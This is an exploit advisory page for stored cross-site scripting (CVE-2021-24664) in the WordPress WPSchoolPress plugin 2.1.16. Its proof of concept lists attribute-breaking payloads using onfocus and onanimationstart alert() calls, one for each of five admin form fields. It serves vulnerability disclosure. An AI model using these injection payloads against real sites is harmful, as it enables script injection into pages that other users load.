WordPress WPSchoolPress 2.1.16 Cross Site Scripting

2021.11.16
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-79


Ogólna skala CVSS: 3.5/10
Znaczenie: 2.9/10
Łatwość wykorzystania: 6.8/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Jednorazowa
Wpływ na poufność: Brak
Wpływ na integralność: Częściowy
Wpływ na dostępność: Brak

# Exploit Title: WordPress Plugin WPSchoolPress 2.1.16 - 'Multiple' Cross Site Scripting (XSS) # Date: 20/08/2021 # Exploit Author: Davide Taraschi # Vendor Homepage: https://wpschoolpress.com/ # Software Link: https://wpschoolpress.com/free-download/ # Version: up to 2.1.17 (non included) # Tested on: Ubuntu 20.04 over WordPress 5.8 and apache2 # CVE : CVE-2021-24664 # Description: The plugin sanitise some fields using a wordpress built-in function called sanitize_text_field() but does not correctly escape them before outputting in attributes, resulting in Stored Cross-Site Scripting issues. The function wp_sanitize_text_field() escape < and > but does not escape characters like ", allowing an attacker to break a HTML input tag and inject arbitrary javascript. # PoC: As admin, - Add a new teacher attendance (/wp-admin/admin.php?page=sch-teacherattendance), Tick the Absent box and put the following payload in the Reason: "style=animation-name:rotation onanimationstart=alert(/XSS/)// The XSS will be triggered when adding another teacher attendance by clicking on the Add button - Add a new Student Attendance (/wp-admin/admin.php?page=sch-attendance), tick the Absent box and put the following payload in the Reason: " style=animation-name:rotation onanimationstart=alert(/XSS/)// The XSS will be triggered when adding another attendance by clicking the 'Add/Update' button - Add a new Subject Mark Field (/wp-admin/admin.php?page=sch-settings&sc=subField) and put the following payload in the 'Field': " autofocus onfocus=alert(/XSS/)// The XSS will be triggered when editing the created Subject Mark (ie /admin.php?page=sch-settings&sc=subField&ac=edit&sid=3) - Create a new Subject (/wp-admin/admin.php?page=sch-subject), with the following payload in the Subject Name field: " autofocus onfocus=alert(/XSS/)// The XSS will be triggered when editing the Subject - Create a new Exam (/wp-admin/admin.php?page=sch-exams) with the following payload in the Exam Name Field: " autofocus onfocus=alert(/XSS/)// The XSS will be triggered when editing the Exam=20 Note that some of this XSS issues can be executed by a teacher (medium-privileged user), but since wordpress uses HTTPonly cookies is impossible to steal cookies.


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top